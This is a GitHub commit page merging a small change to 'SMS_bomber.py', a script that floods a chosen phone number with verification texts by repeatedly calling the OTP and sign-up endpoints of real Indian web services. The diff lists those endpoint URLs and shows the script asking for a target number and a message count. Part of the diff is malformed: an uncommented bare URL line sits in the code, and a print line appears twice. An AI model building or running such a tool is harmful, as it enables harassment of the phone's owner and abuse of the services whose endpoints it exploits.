Merge pull request #1 from mohmmadyahya010101/patch-1

Update SMS_bomber.py
This commit is contained in:
Sameer Bhatt (debugger) 2017-10-31 16:55:13 +05:30 committed by GitHub
commit 51dabe0284
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 1 deletions

View File

@ -32,6 +32,7 @@ def banner():
#http://www.quikr.com/SignIn?aj=1&for=send_otp&user=
https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=
def send(num, counter, slep):
#url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="]
url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile="
@ -48,4 +49,6 @@ try:
banner()
send(input("Enter Target Number : "), int(input("Enter Number of Messages : ")), 1)
except Exception as e:
print("Something is wrong please Re-run this script.")
print("Something is wrong please Re-run this script.")